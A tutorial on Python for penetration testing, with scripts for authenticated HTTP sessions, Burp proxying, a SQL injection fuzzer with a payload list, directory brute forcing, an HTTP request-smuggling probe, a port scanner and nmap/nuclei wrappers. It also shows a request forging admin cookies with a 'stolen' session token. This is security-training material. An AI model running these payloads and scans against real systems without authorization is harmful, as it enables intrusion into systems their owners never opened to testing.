Python for Penetration Testing: Scripting Custom Exploits and Automation
Python is the de facto language of penetration testing. It's available on almost every Linux system, has an enormous library ecosystem, and produces readable, maintainable scripts. This guide covers practical Python for security professionals — from automating HTTP testing to writing raw packet-level tools.
Essential Libraries
Python Security Scripting Best Practices
Always use virtual environments for security tools to avoid dependency conflicts. Use requests with verify=False only in lab environments — production pentests should use proper certificate validation unless specifically testing TLS issues. Use asyncio and aiohttp for high-throughput scanning, but cap concurrency so you don't trip rate limits or WAF blocks.
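The asyncio/aiohttp pattern is easy to get wrong without a concurrency cap. Here is a minimal sketch of the throttling idea using a semaphore and a stand-in probe coroutine — swap in a real aiohttp GET in practice; the hostnames and limits are illustrative:

```python
import asyncio

async def probe(host: str) -> str:
    """Placeholder for a real check (e.g., an aiohttp GET in practice)."""
    await asyncio.sleep(0.01)  # simulate network latency
    return f"{host}: up"

async def run_throttled(hosts, max_concurrent=10):
    # The semaphore caps in-flight coroutines so the scan stays throttled
    sem = asyncio.Semaphore(max_concurrent)

    async def bounded(host):
        async with sem:
            return await probe(host)

    return await asyncio.gather(*(bounded(h) for h in hosts))

# 20 hosts checked, at most 5 concurrently
results = asyncio.run(run_throttled([f"10.0.0.{i}" for i in range(1, 21)],
                                    max_concurrent=5))
print(len(results))
```

The same skeleton works for any per-host check: only `probe` changes, while the semaphore keeps the request rate bounded.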
Python Security Libraries Reference
| Library | Use Case | Security Feature | Install | Example |
|---|---|---|---|---|
| requests | HTTP clients, fuzzing | Session handling, proxy support | pip install requests | requests.get(url, proxies=burp) |
| scapy | Packet crafting, network analysis | Raw socket manipulation | pip install scapy | IP()/TCP()/send() |
| pwntools | CTF exploitation, binary analysis | ROP chains, shellcode | pip install pwntools | from pwn import * |
| impacket | Active Directory attacks, SMB | Kerberos, NTLM, SMB libs | pip install impacket | GetUserSPNs.py |
| cryptography | Hash cracking, crypto analysis | Multiple cipher support | pip install cryptography | Fernet, RSA, AES |
| paramiko | SSH automation, SFTP | SSH key and password auth | pip install paramiko | SSHClient().connect() |
| ldap3 | LDAP enumeration, injection testing | LDAP bind and search | pip install ldap3 | Server() + Connection() |
- requests — HTTP automation, session handling, proxy support
- beautifulsoup4 — HTML parsing for scraping and extraction
- socket — raw TCP/UDP connections (built-in)
- subprocess — execute system commands and capture output
- threading / concurrent.futures — parallel execution
- scapy — packet crafting and analysis
- argparse — CLI argument parsing for your tools
- colorama — colored terminal output
```bash
pip install requests beautifulsoup4 scapy colorama
```
The requests Library for HTTP Automation
The requests library is your primary tool for web application testing automation. Key patterns:
Session Handling
```python
import requests

# Session persists cookies across requests (essential for authenticated testing)
session = requests.Session()

# Login
login_data = {"username": "testuser", "password": "testpass"}
resp = session.post("https://example.com/login", data=login_data)

# Subsequent requests use the authenticated session cookie automatically
resp = session.get("https://example.com/api/profile")
print(resp.json())
```
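Login forms often embed a CSRF token that must be scraped before the POST. beautifulsoup4 (listed above) is the usual choice; as a dependency-free sketch, the stdlib html.parser can pull a hidden field — the `csrf_token` field name is an assumption about the target form:

```python
from html.parser import HTMLParser

class TokenExtractor(HTMLParser):
    """Collect values of hidden <input> fields, keyed by field name."""
    def __init__(self):
        super().__init__()
        self.tokens = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attrs = dict(attrs)
        if attrs.get("type") == "hidden" and "name" in attrs:
            self.tokens[attrs["name"]] = attrs.get("value", "")

html = '<form><input type="hidden" name="csrf_token" value="abc123"></form>'
parser = TokenExtractor()
parser.feed(html)
print(parser.tokens["csrf_token"])  # token to include in the login POST
```

In a real flow: `session.get` the login page, feed `resp.text` to the extractor, then add the token to `login_data` before posting.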
Proxy Through Burp Suite
```python
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

# Disable SSL verification for Burp's self-signed cert
resp = requests.get(
    "https://example.com/endpoint",
    proxies=proxies,
    verify=False,
    headers={"X-Custom-Header": "test"},
)
print(resp.status_code, resp.text[:200])
```
Custom Headers and Cookies
```python
headers = {
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
    "X-Forwarded-For": "127.0.0.1",
    "User-Agent": "Mozilla/5.0 (compatible; custom-scanner/1.0)",
}
cookies = {
    "session": "stolen_session_token",
    "role": "admin",
}
resp = requests.get("https://example.com/admin", headers=headers, cookies=cookies)
```
Writing a Basic SQLi Fuzzer
```python
import time

import requests
import urllib3

urllib3.disable_warnings()

TARGET = "https://example.com/search"
PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

PAYLOADS = [
    "'",
    "''",
    "' OR '1'='1",
    "' OR '1'='1'--",
    "1; SELECT SLEEP(5)--",
    "1 AND SLEEP(5)--",
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
]

# Patterns are lowercase because they are matched against the lowercased body
ERROR_PATTERNS = [
    "mysql", "sql syntax", "warning", "ora-", "pg_", "sqlite",
    "syntax error", "unterminated", "unexpected",
]

for payload in PAYLOADS:
    start = time.time()
    try:
        resp = requests.get(
            TARGET,
            params={"q": payload},
            proxies=PROXY,
            verify=False,
            timeout=10,
        )
        elapsed = time.time() - start
        body_lower = resp.text.lower()
        # Check for error-based SQLi
        if any(p in body_lower for p in ERROR_PATTERNS):
            print(f"[ERROR-BASED] payload={payload!r} matched error pattern")
        # Check for time-based SQLi
        if elapsed > 4.5:
            print(f"[TIME-BASED] payload={payload!r} response={elapsed:.1f}s")
    except requests.exceptions.Timeout:
        print(f"[TIMEOUT] payload={payload!r} (possible blind injection)")
    except Exception as e:
        print(f"[ERROR] payload={payload!r} exception={e}")
```
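Beyond error- and time-based signals, boolean-based injection shows up as a differential: a TRUE-condition payload returns the baseline page while a FALSE-condition payload diverges. A minimal sketch of that comparison, where the 0.98 similarity threshold is an arbitrary starting point to tune per target:

```python
from difflib import SequenceMatcher

def looks_boolean_injectable(baseline: str, true_body: str, false_body: str,
                             threshold: float = 0.98) -> bool:
    """Flag when the TRUE-condition response matches the baseline but the
    FALSE-condition response diverges — the classic boolean-based signal."""
    true_sim = SequenceMatcher(None, baseline, true_body).ratio()
    false_sim = SequenceMatcher(None, baseline, false_body).ratio()
    return true_sim >= threshold and false_sim < threshold

# In practice the three bodies come from requests such as:
#   ?q=widget                 (baseline)
#   ?q=widget' AND '1'='1     (TRUE condition)
#   ?q=widget' AND '1'='2     (FALSE condition)
print(looks_boolean_injectable("10 results for widget",
                               "10 results for widget",
                               "0 results"))  # True
```

Comparing similarity ratios rather than exact bodies tolerates dynamic content like timestamps and CSRF tokens that change between requests.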
Threading for Parallel Testing
Sequential scanning is slow. Use concurrent.futures for parallel HTTP requests:
```python
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests

with open("targets.txt") as f:
    TARGETS = f.read().splitlines()
with open("/usr/share/wordlists/dirb/common.txt") as f:
    WORDLIST = f.read().splitlines()

MAX_WORKERS = 20

def check_path(base_url, path):
    url = f"{base_url.rstrip('/')}/{path}"
    try:
        resp = requests.get(url, timeout=5, allow_redirects=False)
        if resp.status_code not in [404, 400, 403]:
            return url, resp.status_code
    except requests.RequestException:
        pass
    return None

results = []
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
    futures = {
        executor.submit(check_path, target, path): (target, path)
        for target in TARGETS
        for path in WORDLIST
    }
    for future in as_completed(futures):
        result = future.result()
        if result:
            url, status = result
            print(f"[{status}] {url}")
            results.append(result)
```
Raw TCP Connections with socket
```python
import socket

def send_raw_http(host, port, raw_request):
    """Send a raw HTTP request over TCP and return the full response."""
    with socket.create_connection((host, port)) as s:
        s.sendall(raw_request.encode())
        response = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            response += chunk
    return response.decode(errors="replace")

# Useful for HTTP request smuggling tests (CL.TE desync probe)
request = (
    "POST / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Content-Length: 6\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "0\r\n"
    "\r\n"
    "X-Foo: x"
)
print(send_raw_http("example.com", 80, request)[:500])
```
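When mutating raw requests it helps to start from a baseline whose Content-Length is actually correct, then break it deliberately. A small hypothetical helper that computes the header from the body:

```python
def build_raw_request(method, path, host, body="", extra_headers=None):
    """Assemble a raw HTTP/1.1 request with a correct Content-Length,
    ready to be mutated for smuggling experiments."""
    headers = {
        "Host": host,
        "Content-Length": str(len(body.encode())),
        "Connection": "close",
    }
    headers.update(extra_headers or {})
    head = "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return f"{method} {path} HTTP/1.1\r\n{head}\r\n{body}"

raw = build_raw_request("POST", "/", "example.com", body="q=test")
print(raw.splitlines()[2])  # Content-Length: 6
```

From this baseline you can override `Content-Length` or append a `Transfer-Encoding` header via `extra_headers` and feed the result to `send_raw_http`.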
Simple Port Scanner
```python
import socket
import concurrent.futures

def scan_port(host, port, timeout=1):
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return port, True
    except OSError:
        return port, False

def port_scan(host, ports):
    open_ports = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=100) as ex:
        futures = {ex.submit(scan_port, host, p): p for p in ports}
        for f in concurrent.futures.as_completed(futures):
            port, is_open = f.result()
            if is_open:
                open_ports.append(port)
                print(f"[OPEN] {host}:{port}")
    return sorted(open_ports)

top_ports = list(range(1, 1025)) + [1433, 3306, 3389, 5432, 8080, 8443, 8888]
port_scan("192.168.1.1", top_ports)
```
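Once a port is confirmed open, a banner grab often identifies the service without nmap. A sketch that reads whatever the service volunteers first (works for speak-first protocols like SSH, FTP, and SMTP; HTTP needs a request sent first):

```python
import socket

def grab_banner(host, port, timeout=2.0):
    """Connect and return the first line the service sends, if any."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            return s.recv(1024).decode(errors="replace").strip()
    except OSError:
        # Closed port, filtered port, or a service that waits for the client
        return ""

# e.g. grab_banner("192.168.1.1", 22) might return something like
# "SSH-2.0-OpenSSH_9.6" depending on the target
```

Feeding the `open_ports` list from `port_scan` through `grab_banner` gives a quick service inventory per host.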
Integrating with Existing Tools
```python
import json
import subprocess

def run_nmap(target):
    """Run an nmap service scan and return its XML output as a string."""
    result = subprocess.run(
        ["nmap", "-sV", "-oX", "-", target],
        capture_output=True,
        text=True,
        timeout=120,
    )
    return result.stdout

def run_nuclei_json(targets_file, templates_dir):
    """Run nuclei and collect its line-delimited JSON findings."""
    result = subprocess.run(
        ["nuclei", "-l", targets_file, "-t", templates_dir,
         "-json", "-silent", "-no-color"],
        capture_output=True,
        text=True,
        timeout=3600,
    )
    findings = []
    for line in result.stdout.splitlines():
        try:
            findings.append(json.loads(line))
        except json.JSONDecodeError:
            pass
    return findings
```
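run_nmap hands back raw XML; the stdlib xml.etree can turn it into structured port data. A sketch following the element names in nmap's XML output (host/ports/port, state, service):

```python
import xml.etree.ElementTree as ET

def parse_nmap_xml(xml_text):
    """Extract (port, protocol, state, service) tuples from nmap -oX output."""
    results = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        for port in host.iter("port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            results.append((
                int(port.get("portid")),
                port.get("protocol"),
                state,
                svc.get("name") if svc is not None else "",
            ))
    return results

# Usage: services = parse_nmap_xml(run_nmap("192.168.1.1"))
```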
Integrate your Python automation output with the Pentest Findings Documenter to convert raw tool results into structured report-ready findings. Use the Smart Paste tool to parse and categorize pasted tool output automatically.
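Before handing results to a report tool, it helps to normalize them first. This sketch flattens nuclei JSON findings into a markdown table — field names like `info.severity` and `matched-at` follow nuclei's JSON output, but verify them against your nuclei version:

```python
def findings_to_markdown(findings):
    """Flatten nuclei JSON findings into a markdown table.
    Field names assume nuclei's JSON schema (check per version)."""
    rows = ["| Severity | Template | Matched At |", "|---|---|---|"]
    for f in findings:
        info = f.get("info", {})
        rows.append("| {} | {} | {} |".format(
            info.get("severity", "unknown"),
            f.get("template-id", "?"),
            f.get("matched-at", f.get("matched", "?")),
        ))
    return "\n".join(rows)

sample = [{"template-id": "ssl-issuer",
           "info": {"name": "SSL Issuer", "severity": "info"},
           "matched-at": "https://example.com"}]
print(findings_to_markdown(sample))
```

The output pairs naturally with `run_nuclei_json` above: pass its return value straight in and paste the table into your notes or report draft.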